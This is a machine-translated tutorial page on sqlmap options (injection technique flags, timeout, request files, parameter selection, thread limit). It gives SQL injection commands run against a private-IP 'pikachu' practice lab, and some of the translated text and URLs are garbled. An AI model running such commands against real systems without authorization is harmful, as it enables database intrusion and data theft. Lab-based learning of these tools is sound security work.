当前位置:网站首页>Sqlmap tutorial (III) practical skills II

Sqlmap tutorial (III) practical skills II

2022-07-06 05:58:00 A τθ

One 、–technique Use the specified injection method 

 In some projects , It is inevitable that the network will react slowly ,idc And testing sqlmap The ability of . As a professional penetration tester , We must be fast, accurate and ruthless .
 There are some SQL The injection point only allows time injection , It is designated at this time SQLMAP The injection type of is T

 Here are --technique  Explanation of the value of the parameter :
B:Boolean-basedblindSQLinjection( Boolean Injection )
E:Error-basedSQLinjection( Error reporting injection )
U:UNIONquerySQLinjection( Query injection can be combined )
S:StackedqueriesSQLinjection( Multi statement query injection )
T:Time-basedblindSQLinjection( Injection based on time delay )
Q:InlineSQLInjection( Inline Injection )

Two 、 Use time-based delay injection 

sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 3 -D pikachu --technique=T 

 Support multiple injection detection , The default is all :
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 3 -D pikachu --technique=BEUT

Insert picture description here Insert picture description here

3、 ... and 、 Set timeout 

--time-out  This parameter is to set the timeout   Some web pages are slow to respond , You can use this parameter to increase the access timeout time . The default is 30
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 3 -D pikachu --timeout=10

Four 、 Read text for SQL Injection detection 

sqlmap -r post.txt

Insert picture description here

Insert picture description here Insert picture description here

5、 ... and 、 Specify parameters to inject 

-p  Specify the parameters to be tested 
sqlmap -u "http://192.168.0.103/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name --dbms mysql -v 1 

 Use * For injection 
 If url When it is pseudo static  , have access to * No. indicates that this is the place of detection ;
sqlmap -u "http://192.168.0.103/06/vul/sqli/id/1*./html POST Inject  sqlmap -u "http://192.168.0.103/06/vul/sqli/sqli_id.php" --data "id=1&submit=1" -p id -v 1

6、 ... and 、 Modify the default maximum thread size 

sqlmap/lib/core/settings.py 
 The default maximum thread is 10  You can set the maximum number of threads to 100
MAX_NUMBER_OF_THREADS = 100

Insert picture description here

原网站

版权声明
本文为[A τθ]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/187/202207060548100146.html

边栏推荐

猜你喜欢

随机推荐